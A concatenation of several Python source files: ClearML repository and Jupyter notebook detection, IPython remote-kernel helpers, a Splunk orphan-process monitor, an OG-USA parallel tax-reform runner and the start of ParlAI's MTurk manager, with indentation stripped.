pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
# noinspection PyProtectedMember
task._update_script(script=data_script)
# update requirements
# noinspection PyProtectedMember
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
max_diff_size_bytes = 500000
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _get_logger(cls):
return get_logger("Repository Detection")
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename, log_history=False):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename, log_history)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
if log_history:
get_ipython().events.register('post_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
# check if we are running in vscode, we have the jupyter notebook defined:
if 'IPython' in sys.modules:
# noinspection PyBroadException
try:
from IPython import get_ipython # noqa
ip = get_ipython()
# vscode-jupyter PR #8531 added this variable
local_ipynb_file = ip.__dict__.get('user_ns', {}).get('__vsc_ipynb_file__') if ip else None
if local_ipynb_file:
# now replace the .ipynb with .py
# we assume we will have that file available for monitoring
local_ipynb_file = Path(local_ipynb_file)
script_entry_point = local_ipynb_file.with_suffix('.py').as_posix()
# install the post store hook,
                # notice that if we do not have a local file we serialize/write the entire notebook every time
cls._jupyter_install_post_store_hook(local_ipynb_file.as_posix(), log_history=False)
return script_entry_point
except Exception:
pass
if not (sys.argv[0].endswith(os.path.sep + 'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
server_info = None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
# noinspection PyBroadException
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
# noinspection PyPackageRequirements
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), '??server-*.json')):
# noinspection PyBroadException
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except Exception:
server_info = None
if server_info:
break
cookies = None
password = None
if server_info and server_info.get('password'):
# we need to get the password
from ....config import config
password = config.get('development.jupyter_server_password', '')
if not password:
cls._get_logger().warning(
'Password protected Jupyter Notebook server was found! '
'Add `sdk.development.jupyter_server_password=<jupyter_password>` to ~/clearml.conf')
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
r = requests.get(url=server_info['url'] + 'login')
cookies = {'_xsrf': r.cookies.get('_xsrf', '')}
r = requests.post(server_info['url'] + 'login?next', cookies=cookies,
data={'_xsrf': cookies['_xsrf'], 'password': password})
cookies.update(r.cookies)
auth_token = server_info.get('token') or os.getenv('JUPYTERHUB_API_TOKEN') or ''
try:
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(auth_token), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
# noinspection PyUnresolvedReferences
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(auth_token), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
# send request to the jupyter server
try:
r.raise_for_status()
except Exception as ex:
cls._get_logger().warning('Failed accessing the jupyter server{}: {}'.format(
' [password={}]'.format(password) if server_info.get('password') else '', ex))
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = str(notebook_name or 'notebook').replace(
'>', '_').replace('<', '_').replace('.ipynb', '.py')
if not script_entry_point.lower().endswith('.py'):
script_entry_point += '.py'
local_ipynb_file = None
else:
# always slash, because this is from uri (so never backslash not even on windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# fix for VSCode pushing uuid at the end of the notebook name.
if not entry_point.exists():
# noinspection PyBroadException
try:
alternative_entry_point = '-'.join(entry_point_filename.split('-')[:-5])+'.ipynb'
# now we should try to find the actual file
entry_point_alternative = (Path.cwd() / alternative_entry_point).absolute()
if not entry_point_alternative.is_file():
entry_point_alternative = (Path.cwd() / alternative_entry_point).absolute()
# If we found it replace it
if entry_point_alternative.exists():
entry_point = entry_point_alternative
except Exception as ex:
cls._get_logger().warning('Failed accessing jupyter notebook {}: {}'.format(notebook_path, ex))
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
# install the post store hook,
            # notice that if we do not have a local file we serialize/write the entire notebook every time
cls._jupyter_install_post_store_hook(local_ipynb_file, is_google_colab)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(
str(script_path), str(cls._get_working_dir(repo_root, return_abs=True)))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _cwd(cls):
# return the current working directory (solve for hydra changing it)
# check if running with hydra
if sys.modules.get('hydra'):
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
import hydra # noqa
return Path(hydra.utils.get_original_cwd()).absolute()
except Exception:
pass
return Path.cwd().absolute()
@classmethod
def _get_working_dir(cls, repo_root, return_abs=False):
# get the repository working directory (might be different from actual cwd)
repo_root = Path(repo_root).absolute()
cwd = cls._cwd()
try:
# do not change: test if we are under the repo root folder, it will throw an exception if we are not
relative = cwd.relative_to(repo_root).as_posix()
return cwd.as_posix() if return_abs else relative
except ValueError:
# Working directory not under repository root, default to repo root
return repo_root.as_posix() if return_abs else '.'
@classmethod
def _absolute_path(cls, file_path, cwd):
# return the absolute path, relative to a specific working directory (cwd)
file_path = Path(file_path)
if file_path.is_absolute():
return file_path.as_posix()
# Convert to absolute and squash 'path/../folder'
return os.path.abspath((Path(cwd).absolute() / file_path).as_posix())
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(
cls, filepaths, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False, detect_jupyter_notebook=True,
add_missing_installed_packages=False, detailed_req_report=None):
jupyter_filepath = cls._get_jupyter_notebook_filename() if detect_jupyter_notebook else None
if jupyter_filepath:
scripts_path = [Path(os.path.normpath(jupyter_filepath)).absolute()]
else:
cwd = cls._cwd()
scripts_path = [Path(cls._absolute_path(os.path.normpath(f), cwd)) for f in filepaths if f]
scripts_path = [f for f in scripts_path if f.exists()]
if not scripts_path:
raise ScriptInfoError(
"Script file {} could not be found".format(filepaths)
)
scripts_dir = [f.parent for f in scripts_path]
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
script_dir = scripts_dir[0]
script_path = scripts_path[0]
plugin = next((p for p in cls.plugins if p.exists(script_dir)), None)
repo_info = DetectionResult()
messages = []
auxiliary_git_diff = None
if not plugin:
if log:
log.info("No repository found, storing script code instead")
else:
try:
repo_info = plugin.get_info(
str(script_dir), include_diff=check_uncommitted, diff_from_remote=uncommitted_from_remote)
except SystemExit:
raise
except Exception as ex:
_log("no info for {} ({})", scripts_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", scripts_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
# allow to override the VCS working directory (notice relative to the git repo)
# because we can have a sync folder on remote pycharm sessions
# not syncing from the Git repo, but from a subfolder, so the pycharm plugin need to pass the override
working_dir = VCS_WORK_DIR.get() if VCS_WORK_DIR.get() else cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
# make sure diff is not too big:
if len(diff) > cls.max_diff_size_bytes:
messages.append(
"======> WARNING! Git diff to large to store "
"({}kb), skipping uncommitted changes <======".format(len(diff)//1024))
auxiliary_git_diff = diff
diff = '# WARNING! git diff too large to store, clear this section to execute without it.\n' \
'# full git diff available in Artifacts/auxiliary_git_diff\n' \
'# Clear the section before enqueueing Task!\n'
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=script_path.as_posix()
if not repo_info.url and script_path.is_file() else None,
add_missing_installed_packages=add_missing_installed_packages,
detailed_req_report=detailed_req_report,
)
else:
script_requirements = None
script_info = dict(
repository=remove_user_pass_from_url(repo_info.url),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
repo_root=repo_root,
jupyter_filepath=jupyter_filepath,
)
# if repo_info.modified:
# messages.append(
# "======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
# script_info.get("repository", "")
# )
# )
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages, auxiliary_git_diff=auxiliary_git_diff),
script_requirements)
@classmethod
def get(cls, filepaths=None, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False, detect_jupyter_notebook=True, add_missing_installed_packages=False,
detailed_req_report=None):
try:
if not filepaths:
filepaths = [sys.argv[0], ]
return cls._get_script_info(
filepaths=filepaths,
check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log,
uncommitted_from_remote=uncommitted_from_remote,
detect_jupyter_notebook=detect_jupyter_notebook,
add_missing_installed_packages=add_missing_installed_packages,
detailed_req_report=detailed_req_report,
)
except SystemExit:
pass
except BaseException as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def is_running_from_module(cls):
# noinspection PyBroadException
try:
return '__main__' in sys.modules and vars(sys.modules['__main__'])['__package__']
except Exception:
return False
@classmethod
def detect_running_module(cls, script_dict):
# noinspection PyBroadException
try:
# If this is jupyter, do not try to detect the running module, we know what we have.
if script_dict.get('jupyter_filepath'):
return script_dict
if cls.is_running_from_module():
argvs = ''
git_root = os.path.abspath(str(script_dict['repo_root'])) if script_dict['repo_root'] else None
for a in sys.argv[1:]:
if git_root and os.path.exists(a):
# check if common to project:
a_abs = os.path.abspath(a)
if os.path.commonpath([a_abs, git_root]) == git_root:
# adjust path relative to working dir inside git repo
a = ' ' + os.path.relpath(
a_abs, os.path.join(git_root, str(script_dict['working_dir'])))
argvs += ' {}'.format(a)
# noinspection PyBroadException
try:
module_name = vars(sys.modules['__main__'])['__spec__'].name
except Exception:
module_name = vars(sys.modules['__main__'])['__package__']
# update the script entry point to match the real argv and module call
script_dict['entry_point'] = '-m {}{}'.format(module_name, (' ' + argvs) if argvs else '')
except Exception:
pass
return script_dict
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
auxiliary_git_diff = attr.ib(default=None)
class _JupyterHistoryLogger(object):
_reg_replace_ipython = r'\n([ \t]*)get_ipython\(\)'
_reg_replace_magic = r'\n([ \t]*)%'
_reg_replace_bang = r'\n([ \t]*)!'
def __init__(self):
self._exception_raised = False
self._cells_code = {}
self._counter = 0
self._ip = None
self._current_cell = None
# noinspection PyBroadException
try:
import re
self._replace_ipython_pattern = re.compile(self._reg_replace_ipython)
self._replace_magic_pattern = re.compile(self._reg_replace_magic)
self._replace_bang_pattern = re.compile(self._reg_replace_bang)
except Exception:
self._replace_ipython_pattern = None
self._replace_magic_pattern = None
self._replace_bang_pattern = None
def hook(self, ip=None):
if not ip:
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
return
self._ip = get_ipython()
else:
self._ip = ip
# noinspection PyBroadException
try:
# if this is colab, the callbacks do not contain the raw_cell content, so we have to patch it
if 'google.colab' in self._ip.extension_manager.loaded:
self._ip._org_run_cell = self._ip.run_cell
self._ip.run_cell = partial(self._patched_run_cell, self._ip)
except Exception:
pass
# start with the current history
self._initialize_history()
self._ip.events.register('post_run_cell', self._post_cell_callback)
self._ip.events.register('pre_run_cell', self._pre_cell_callback)
self._ip.set_custom_exc((Exception,), self._exception_callback)
def _patched_run_cell(self, shell, *args, **kwargs):
# noinspection PyBroadException
try:
raw_cell = kwargs.get('raw_cell') or args[0]
self._current_cell = raw_cell
except Exception:
pass
# noinspection PyProtectedMember
return shell._org_run_cell(*args, **kwargs)
def history(self, filename):
with open(filename, 'wt') as f:
for k, v in sorted(self._cells_code.items(), key=lambda p: p[0]):
f.write(v)
def history_to_str(self):
# return a pair: (history as str, current cell if we are in still in cell execution otherwise None)
return '\n'.join(v for k, v in sorted(self._cells_code.items(), key=lambda p: p[0])), self._current_cell
# noinspection PyUnusedLocal
def _exception_callback(self, shell, etype, value, tb, tb_offset=None):
self._exception_raised = True
return shell.showtraceback()
def _pre_cell_callback(self, *args, **_):
# noinspection PyBroadException
try:
if args:
self._current_cell = args[0].raw_cell
# we might have this value from somewhere else
if self._current_cell:
self._current_cell = self._conform_code(self._current_cell, replace_magic_bang=True)
except Exception:
pass
def _post_cell_callback(self, *_, **__):
# noinspection PyBroadException
try:
self._current_cell = None
if self._exception_raised:
# do nothing
self._exception_raised = False
return
self._exception_raised = False
# add the cell history
# noinspection PyBroadException
try:
cell_code = '\n' + self._ip.history_manager.input_hist_parsed[-1]
except Exception:
return
# fix magic / bang in code
cell_code = self._conform_code(cell_code)
self._cells_code[self._counter] = cell_code
self._counter += 1
except Exception:
pass
def _initialize_history(self):
# only once
if -1 in self._cells_code:
return
# noinspection PyBroadException
try:
cell_code = '\n' + '\n'.join(self._ip.history_manager.input_hist_parsed[:-1])
except Exception:
return
cell_code = self._conform_code(cell_code)
self._cells_code[-1] = cell_code
def _conform_code(self, cell_code, replace_magic_bang=False):
# fix magic / bang in code
if self._replace_ipython_pattern:
cell_code = self._replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', cell_code)
if replace_magic_bang and self._replace_magic_pattern and self._replace_bang_pattern:
cell_code = self._replace_magic_pattern.sub(r'\n# \g<1>%', cell_code)
cell_code = self._replace_bang_pattern.sub(r'\n# \g<1>!', cell_code)
return cell_code
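# --- Hedged usage sketch (added for illustration; not part of the original file) ---
# A minimal example of how the `get()` classmethod above might be called to
# collect repository / entry-point information for the current process. The
# enclosing class name (`ScriptInfo`) and the keyword values chosen below are
# assumptions for this sketch only.
def _example_collect_script_info():
    result, script_requirements = ScriptInfo.get(
        filepaths=[sys.argv[0]],
        check_uncommitted=True,      # store uncommitted changes as a diff
        create_requirements=False,   # skip pip/conda requirements analysis
    )
    if result.script:
        print("repository :", result.script.get("repository"))
        print("entry point:", result.script.get("entry_point"))
        print("working dir:", result.script.get("working_dir"))
    for warning in result.warning_messages:
        print(warning)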
|
_ipython_utils.py
|
"""Utilities for integrating with IPython
These functions should probably reside in Jupyter and IPython repositories,
after which we can import them instead of having our own definitions.
"""
import atexit
import os
try:
import queue
except ImportError:
# Python 2
import Queue as queue
import sys
from subprocess import Popen
from threading import Event, Thread
from uuid import uuid4
from IPython import get_ipython
from jupyter_client import BlockingKernelClient, write_connection_file
from jupyter_core.paths import jupyter_runtime_dir
from tornado.gen import TimeoutError
from tornado.ioloop import IOLoop
OUTPUT_TIMEOUT = 10
def run_cell_remote(ip, kc, cell):
"""Run a cell on a KernelClient
Any output from the cell will be redisplayed in the local session.
"""
msg_id = kc.execute(cell)
in_kernel = getattr(ip, "kernel", False)
if in_kernel:
socket = ip.display_pub.pub_socket
session = ip.display_pub.session
parent_header = ip.display_pub.parent_header
while True:
try:
msg = kc.get_iopub_msg(timeout=OUTPUT_TIMEOUT)
except queue.Empty:
raise TimeoutError("Timeout waiting for IPython output")
if msg["parent_header"].get("msg_id") != msg_id:
continue
msg_type = msg["header"]["msg_type"]
content = msg["content"]
if msg_type == "status":
if content["execution_state"] == "idle":
# idle means output is done
break
elif msg_type == "stream":
stream = getattr(sys, content["name"])
stream.write(content["text"])
elif msg_type in ("display_data", "execute_result", "error"):
if in_kernel:
session.send(socket, msg_type, content, parent=parent_header)
else:
if msg_type == "error":
print("\n".join(content["traceback"]), file=sys.stderr)
else:
sys.stdout.write(content["data"].get("text/plain", ""))
else:
pass
def register_worker_magic(connection_info, magic_name="worker"):
"""Register a %worker magic, given connection_info.
Both a line and cell magic are registered,
which run the given cell in a remote kernel.
"""
ip = get_ipython()
info = dict(connection_info) # copy
key = info.pop("key")
kc = BlockingKernelClient(**info)  # use the copy with 'key' removed
kc.session.key = key
kc.start_channels()
def remote(line, cell=None):
"""Run the current cell on a remote IPython kernel"""
if cell is None:
# both line and cell magic
cell = line
run_cell_remote(ip, kc, cell)
remote.client = kc # preserve reference on kc, largely for mocking
ip.register_magic_function(remote, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote, magic_kind="cell", magic_name=magic_name)
def remote_magic(line, cell=None):
"""A magic for running code on a specified remote worker
The connection_info dict of the worker will be looked up
as the first positional arg to the magic.
The rest of the line (or the entire cell for a %%cell magic)
will be passed to the remote kernel.
Usage:
info = e.start_ipython(worker)[worker]
%remote info print(worker.data)
"""
# get connection info from IPython's user namespace
ip = get_ipython()
split_line = line.split(None, 1)
info_name = split_line[0]
if info_name not in ip.user_ns:
raise NameError(info_name)
connection_info = dict(ip.user_ns[info_name])
if not cell: # line magic, use the rest of the line
if len(split_line) == 1:
raise ValueError("I need some code to run!")
cell = split_line[1]
# turn info dict to hashable str for use as lookup key in _clients cache
key = ",".join(map(str, sorted(connection_info.items())))
session_key = connection_info.pop("key")
if key in remote_magic._clients:
kc = remote_magic._clients[key]
else:
kc = BlockingKernelClient(**connection_info)
kc.session.key = session_key
kc.start_channels()
kc.wait_for_ready(timeout=10)
remote_magic._clients[key] = kc
# actually run the code
run_cell_remote(ip, kc, cell)
# cache clients for re-use in remote magic
remote_magic._clients = {}
def register_remote_magic(magic_name="remote"):
"""Define the parameterized %remote magic
See remote_magic above for details.
"""
ip = get_ipython()
if ip is None:
return # do nothing if IPython's not running
ip.register_magic_function(remote_magic, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote_magic, magic_kind="cell", magic_name=magic_name)
def connect_qtconsole(connection_info, name=None, extra_args=None):
"""Open a QtConsole connected to a worker who has the given future
- identify worker with who_has
- start IPython kernel on the worker
- start qtconsole connected to the kernel
"""
runtime_dir = jupyter_runtime_dir()
if name is None:
name = uuid4().hex
path = os.path.join(runtime_dir, name + ".json")
write_connection_file(path, **connection_info)
cmd = ["jupyter", "qtconsole", "--existing", path]
if extra_args:
cmd.extend(extra_args)
Popen(cmd)
@atexit.register
def _cleanup_connection_file():
"""Cleanup our connection file when we exit."""
try:
os.remove(path)
except OSError:
pass
def start_ipython(ip=None, ns=None, log=None):
"""Start an IPython kernel in a thread
Parameters
----------
ip : str
The IP address to listen on (likely the parent object's ip).
ns : dict
Any names that should be injected into the IPython namespace.
log : logger instance
Hook up IPython's logging to an existing logger instead of the default.
"""
from IPython import get_ipython
if get_ipython() is not None:
raise RuntimeError("Cannot start IPython, it's already running.")
from ipykernel.kernelapp import IPKernelApp
# start IPython, disabling its signal handlers that won't work due to running in a thread:
app = IPKernelApp.instance(log=log)
# Don't connect to the history database
app.config.HistoryManager.hist_file = ":memory:"
# listen on all interfaces, so remote clients can connect:
if ip:
app.ip = ip
# disable some signal handling, logging
def noop():
return None
app.init_signal = noop
app.log_connection_info = noop
# start IPython in a thread
# initialization happens in the thread to avoid threading problems
# with the sqlite history
evt = Event()
def _start():
app.initialize([])
app.kernel.pre_handler_hook = noop
app.kernel.post_handler_hook = noop
app.kernel.start()
# save self in the IPython namespace as 'worker'
# inject things into the IPython namespace
if ns:
app.kernel.shell.user_ns.update(ns)
evt.set()
# start the app's IOLoop in its thread
IOLoop.current().start()
zmq_loop_thread = Thread(target=_start)
zmq_loop_thread.daemon = True
zmq_loop_thread.start()
assert evt.wait(timeout=5), "IPython didn't start in a reasonable amount of time."
return app
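# --- Hedged usage sketch (added for illustration; not part of the original file) ---
# A minimal sketch of how the helpers above could be combined: start an
# in-thread IPython kernel exposing some names, then register a %worker magic
# in the local session that runs cells on that kernel. Reading the connection
# info via `get_connection_info()` (provided on the kernel app by
# jupyter_client's ConnectionFileMixin) is an assumption of this sketch.
def _example_register_worker_magic():
    app = start_ipython(ns={"data": [1, 2, 3]})
    connection_info = app.get_connection_info()
    register_worker_magic(connection_info, magic_name="worker")
    # In an interactive session one could now run:
    #   %worker print(data)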
|
orphan_process_monitor.py
|
# SPDX-FileCopyrightText: 2020 Splunk Inc.
#
# SPDX-License-Identifier: Apache-2.0
from builtins import object
import os
import threading
import time
import traceback
from splunktalib.common import log
class OrphanProcessChecker(object):
def __init__(self, callback=None):
"""
Only works on Linux platforms. On Windows, is_orphan is always
False.
"""
if os.name == "nt":
self._ppid = 0
else:
self._ppid = os.getppid()
self._callback = callback
def is_orphan(self):
if os.name == "nt":
return False
res = self._ppid != os.getppid()
if res:
log.logger.warn("Process=%s has become orphan", os.getpid())
return res
def check_orphan(self):
res = self.is_orphan()
if res and self._callback:
self._callback()
return res
class OrphanProcessMonitor(object):
def __init__(self, callback):
self._checker = OrphanProcessChecker(callback)
self._thr = threading.Thread(target=self._do_monitor)
self._thr.daemon = True
self._started = False
def start(self):
if self._started:
return
self._started = True
self._thr.start()
def stop(self):
self._started = False
def _do_monitor(self):
while self._started:
try:
res = self._checker.check_orphan()
if res:
break
time.sleep(1)
except Exception:
log.logger.error(
"Failed to monitor orphan process, reason=%s",
traceback.format_exc(),
)
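# --- Hedged usage sketch (added for illustration; not part of the original file) ---
# A minimal illustration of wiring OrphanProcessMonitor into a long-running
# worker process. The callback and the sleep-based work loop below are
# placeholders for this example only.
def _example_monitor_orphan():
    def _on_orphaned():
        log.logger.info("Parent process exited, shutting down")

    monitor = OrphanProcessMonitor(_on_orphaned)
    monitor.start()
    try:
        for _ in range(5):
            time.sleep(1)  # stand-in for the process's real work loop
    finally:
        monitor.stop()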
|
run_many_ogusa_parallel.py
|
import ogusa
import os
import sys
from multiprocessing import Process, Pool
import time
import numpy as np
import pandas as pd
from ogusa.scripts import postprocess
from ogusa.scripts.execute import runner
from ogusa.utils import REFORM_DIR, BASELINE_DIR
CUR_PATH = os.path.abspath(os.path.dirname(__file__))
PUF_PATH = os.path.join(CUR_PATH, '../ogusa/puf.csv')
CPU_COUNT = 4
def run_micro_macro(user_params, reform=None, baseline_dir=BASELINE_DIR,
reform_dir=REFORM_DIR, guid='', data=PUF_PATH,
ok_to_run_baseline=True):
start_time = time.time()
T_shifts = np.zeros(50)
T_shifts[2:10] = 0.01
T_shifts[10:40] = -0.01
G_shifts = np.zeros(6)
G_shifts[0:3] = -0.01
G_shifts[3:6] = -0.005
user_params = {'frisch':0.41, 'start_year':2017, 'debt_ratio_ss':1.0, 'T_shifts':T_shifts, 'G_shifts':G_shifts}
'''
------------------------------------------------------------------------
Run baseline
------------------------------------------------------------------------
'''
print('path exists', not os.path.exists(baseline_dir), ok_to_run_baseline)
if not os.path.exists(baseline_dir) and ok_to_run_baseline:
output_base = baseline_dir
input_dir = baseline_dir
kwargs={'output_base':baseline_dir, 'baseline_dir':baseline_dir,
'test':False, 'time_path':True, 'baseline':True,
'analytical_mtrs':False, 'age_specific':True,
'user_params':user_params,'guid':'baseline',
'run_micro':True, 'small_open': False, 'budget_balance':False,
'baseline_spending':False, 'data': data}
#p1 = Process(target=runner, kwargs=kwargs)
#p1.start()
runner(**kwargs)
'''
------------------------------------------------------------------------
Run reform
------------------------------------------------------------------------
'''
output_base = reform_dir
input_dir = reform_dir
kwargs={'output_base':output_base, 'baseline_dir':baseline_dir,
'test':False, 'time_path':True, 'baseline':False,
'analytical_mtrs':False, 'age_specific':True,
'user_params':user_params,'guid':guid, 'reform':reform ,
'run_micro':True, 'small_open': False, 'budget_balance':False,
'baseline_spending':False, 'data': data}
runner(**kwargs)
ans = postprocess.create_diff(baseline_dir=baseline_dir, policy_dir=reform_dir)
print "total time was ", (time.time() - start_time)
print 'Percentage changes in aggregates:', ans
# return ans
if __name__ == "__main__":
data = pd.read_csv(PUF_PATH)
reform0 = {
2016: {
'_II_rt1': [.09],
'_II_rt2': [.135],
'_II_rt3': [.225],
'_II_rt4': [.252],
'_II_rt5': [.297],
'_II_rt6': [.315],
'_II_rt7': [0.3564],
},
}
reform1 = {
2016: {
'_II_rt7': [0.35],
},
}
reform2 = {
2016: {
'_II_rt7': [0.34],
}, }
reform3 = {
2016: {
'_CG_rt3': [0.25],
}, }
reform4 = {
2016: {
'_CG_rt3': [0.24],
}, }
reform5 = {
2016: {
'_CG_rt3': [0.16],
}, }
reform6 = {
2016: {
'_STD': [ [6100*2, 12200*2, 6100*2, 8950*2, 12200*2],
[6200*2, 12400*2, 6200*2, 9100*2, 12400*2],
[6300*2, 12600*2, 6300*2, 9250*2, 12600*2]]
}, }
reform7 = {
2016: {
'_STD': [ [6100*2.1, 12200*2.1, 6100*2.1, 8950*2.1, 12200*2.1],
[6200*2.1, 12400*2.1, 6200*2.1, 9100*2.1, 12400*2.1],
[6300*2.1, 12600*2.1, 6300*2.1, 9250*2.1, 12600*2.1]]
}, }
reform8 = {
2016: {
'_II_rt3': [.15],
'_II_rt4': [.15],
'_II_rt5': [.15],
'_II_brk5':[[250000, 250000, 125000, 250000, 250000]]
}, }
reform9 = {
2016: {
'_STD': [[12600, 25200, 12600, 18600, 25300]],
'_II_brk1': [[27825, 55650, 27825, 39750, 55650]],
'_II_brk2': [[65005, 130010, 65005, 88180, 130010]],
'_AMT_rt1': [.0],
'_AMT_rt2': [.0]
},}
reforms = [reform0, reform1, reform2, reform3, reform4, reform5, reform6,
reform7, reform8, reform9]
# make sure we have a baseline result before other reforms are run
ok_to_run_baseline = True
run_micro_macro({},
reforms[0],
"./OUTPUT_BASELINE",
"./OUTPUT_REFORM_" + str(0),
str(0),
data,
ok_to_run_baseline,)
# run reforms in parallel
pool = Pool(processes=CPU_COUNT)
results = []
ok_to_run_baseline = False
for i in range(1, len(reforms)):
args = ({},
reforms[i],
"./OUTPUT_BASELINE",
"./OUTPUT_REFORM_" + str(i),
str(i),
data,
ok_to_run_baseline,)
async_result = pool.apply_async(run_micro_macro, args)
results.append(async_result)
for result in results:
result.get()
pool.close()
pool.join()
|
mturk_manager.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import logging
import math
import os
import pickle
import threading
import time
import uuid
import errno
import requests
from parlai.mturk.core.agents import AssignState
from parlai.mturk.core.socket_manager import Packet, SocketManager
from parlai.mturk.core.worker_manager import WorkerManager
from parlai.mturk.core.mturk_data_handler import MTurkDataHandler
import parlai.mturk.core.data_model as data_model
import parlai.mturk.core.mturk_utils as mturk_utils
import parlai.mturk.core.server_utils as server_utils
import parlai.mturk.core.shared_utils as shared_utils
# Timeout before cancelling a world start
WORLD_START_TIMEOUT = 11
# Multiplier to apply when creating hits to ensure worker availability
HIT_MULT = 1.5
# 6 minute timeout to ensure only one thread updates the time logs.
# Those update once daily in a 3 minute window
RESET_TIME_LOG_TIMEOUT = 360
TIME_LOGS_FILE_NAME = 'working_time.pickle'
TIME_LOGS_FILE_LOCK = 'working_time.lock'
AMAZON_SNS_NAME = 'AmazonMTurk'
SNS_ASSIGN_ABANDONDED = 'AssignmentAbandoned'
SNS_ASSIGN_SUBMITTED = 'AssignmentSubmitted'
SNS_ASSIGN_RETURNED = 'AssignmentReturned'
PARLAI_MTURK_NOTICE_URL = 'http://www.parl.ai/mturk/mturk_notice/'
PARLAI_MTURK_UPLOAD_URL = 'http://www.parl.ai/mturk/mturk_stats/'
PARLAI_CRED_DIR = os.path.expanduser('~/.parlai')
PARLAI_MTURK_LOG_PERMISSION_FILE = \
